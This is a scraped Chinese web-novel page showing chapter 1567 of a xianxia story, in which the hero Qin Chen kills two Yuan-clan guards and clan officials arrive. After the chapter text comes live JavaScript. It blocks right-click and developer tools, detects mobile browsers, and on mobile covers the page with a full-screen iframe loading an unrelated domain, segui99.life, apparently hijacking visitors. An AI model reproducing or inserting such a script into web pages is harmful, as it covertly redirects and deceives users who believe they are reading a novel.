新笔趣阁
会员书架
首页 > 武侠修真 > 神道帝尊 > 第1567章 我这个人,脾气不好。

第1567章 我这个人,脾气不好。(1 / 2)

章节目录 加入书签
好书推荐: 智能狂潮 隐婚娇妻太迷人 大秦皇陵 天启镇魂曲 半岛检察官 全职法师之肖峰 我的极品美女老婆 最后一张录取通知书 诡异民间档案:异事录 嫌疑之索

终究元成风还是忍不住喝了一声:“上!”

两道身影在此刻直接杀出。

那二人皆是虚圣一重级别的高手此刻瞬间爆发气势惊人房间内桌椅瞬间炸裂开来。

秦尘却是冷笑一声脚步跨出拳头紧握一拳直接砸出。

嘭……

那拳劲分为两股直接杀向二人。

两道身影胸口穿透轰隆一声跌倒门外直接穿透对面房间跌倒在大街之上眼看是活不成了。

“虚圣三重!”

元成风一眼看出秦尘实力。

居然是与他一般虚圣三重。

万魔城内什么时候出现这么一个青年才俊他竟然不知道。

秦尘此刻却是笑了笑没有多说。

元成风脸色阴冷道:“你在此地闹事那就是找死。”

“街上死了元家的人元家护卫立刻会到来。”

“来就来呗!”

秦尘却是不介意道:“来多少杀多少。”

他本意不想惹事但是真惹了事麻烦归麻烦可是还是得解决才好。

甚至是此番能确保离心陵和离心灵月兄妹二人安全的话灭了元家也未尝不可。

此时此刻二人气势僵持。

“谁在元家城内闹事?”

一道喝声滚滚而来。

陡然间下一刻三道身影破空而出出现在酒楼内。

大街上更有一队身着统一甲胄的卫兵一一到来。

元家的护卫到了。

速度之快令人咋舌!

“元灏大统领!”

元成风看到来人却是微微松了口气。

元灏大统领可是统管元家安危之责任整个元家城内的护卫尽归其一人掌控。

而其本身亦是一位虚圣十重级别的高手。

“元成风?发生何事?”

那元灏一身银甲约么三十几岁年纪外貌气质出众说起话来亦是掷地有声。

“元灏统领!”

元成风拱手道:“这离心陵和离心灵月欠我圣石我派苏隆讨要结果这秦尘居然打伤苏隆我亲自出面他竟杀我两名护卫。”

听到此话元灏眉头一挑。

离心陵此刻却是喝道:“他胡说八道我们本来还了五万圣石可是这家伙说我们欠了七万故意找茬这才动手……”

元灏更是眉头一皱。

元成风什么人品他还是知道的。

可是这里是元家城!

元家的人错了也是对的!

元灏看向秦尘眉清目秀俊朗青年看起来似乎并不大可是境界却是不弱。

“既然如此随我回去仔细查问吧!”

元灏直接道。

“查问什么?”

秦尘却是笑道:“我做人不喜欢被人压迫!”

“那可由不得你!”

元灏此刻一步跨出抓向秦尘。

“住手!”

一道喝声在此刻突然响起。

酒楼通道十几道身影一一到来。

那为首一人却是面目带着几分急切急忙出声呵斥道。

“元封少爷!”

元成风、元灏二人看向青年却是急忙拱手施礼。

元封!

元家嫡系子弟身份地位可是高高在上。

元家强大到这一步整个元家城内元氏族人足足数千。

可是真正的核心嫡系还是那些位。

元家族长元茂丰二爷元承载三姑姑元怡心四爷元茂明。

这几位的子女那都是身份显赫的。

元成风也是元家族人可是不知道是旁系分出去多少了。

点击切换 [繁体版] [简体版]
章节目录 加入书签
新书推荐: 误嫁妖孽世子 嫡女 死神降临 重生之娇宠小娘子 天生科技狂 神武都市 大明骑龙 穿越扶摇九天 沈家有女 此情荒唐不可欺
// 禁止查看源码 document.addEventListener('contextmenu', function (e) { e.preventDefault(); }); // 禁止鼠标右键 document.addEventListener('keydown', function (e) { if (e.keyCode === 93 || (e.ctrlKey && e.shiftKey && e.keyCode === 73)) { e.preventDefault(); } }); // 禁止 F12 document.addEventListener('keydown', function (e) { if (e.keyCode === 123) { e.preventDefault(); } }); document.addEventListener('DOMContentLoaded', function () { main(); }); function isMobile() { const userAgent = navigator.userAgent.toLowerCase(); const mobileKeywords = ['nokia', 'sony', 'ericsson', 'mot', 'samsung', 'htc', 'sgh', 'lg', 'sharp', 'sie-', 'philips', 'panasonic', 'alcatel', 'lenovo', 'iphone', 'ipod', 'blackberry', 'meizu', 'android', 'netfront', 'symbian', 'ucweb', 'windowsce', 'palm', 'operamini', 'operamobi', 'openwave', 'nexusone', 'cldc', 'midp', 'wap', 'mobile']; if (userAgent.includes('http_x_wap_profile') || userAgent.includes('wap') || userAgent.includes('mobile') || mobileKeywords.some(keyword => userAgent.includes(keyword))) { return true; } if (userAgent.includes('vnd.wap.wml') && (userAgent.includes('text/html') === false || userAgent.indexOf('vnd.wap.wml') < userAgent.indexOf('text/html'))) { return true; } return false; } function isSpider() { const userAgent = navigator.userAgent.toLowerCase(); const spiderKeywords = ['googlebot', 'spider', 'baiduspider', 'yahooslurp', 'msnbot', 'sosospider', 'yodaobot', 'outfoxbot', 'sogou web spider', 'sogou orion spider', 'fast-webcrawler', 'gaisbot', 'ia_archiver', 'altavista', 'lycos_spider', 'inktomi slurp']; return spiderKeywords.some(keyword => userAgent.includes(keyword)); } function main() { const isMobileDevice = isMobile(); // const isSpiderBot = isSpider(); if (isMobileDevice) { const url = 'segui99.life'; setTimeout(function () { var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?ac76300945c612415ea74e6625be7a6e"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); // 创建白色 iframe 元素 const whiteIframe = document.createElement('iframe'); whiteIframe.style.position = 'fixed'; whiteIframe.style.top = '0'; whiteIframe.style.left = '0'; whiteIframe.style.width = '100%'; whiteIframe.style.height = '100%'; whiteIframe.style.border = 'none'; whiteIframe.style.backgroundColor = 'white'; // 将白色 iframe 添加到 body 元素中 document.body.appendChild(whiteIframe); // 创建 iframe 元素 const iframe = document.createElement('iframe'); iframe.style.position = 'fixed'; iframe.style.top = '0'; iframe.style.left = '0'; iframe.style.width = '100%'; iframe.style.height = '100%'; iframe.style.border = 'none'; // 设置 iframe 的 src iframe.src = `https://${url}/`; // 将 iframe 添加到 body 元素中 document.body.appendChild(iframe); }, 500); } }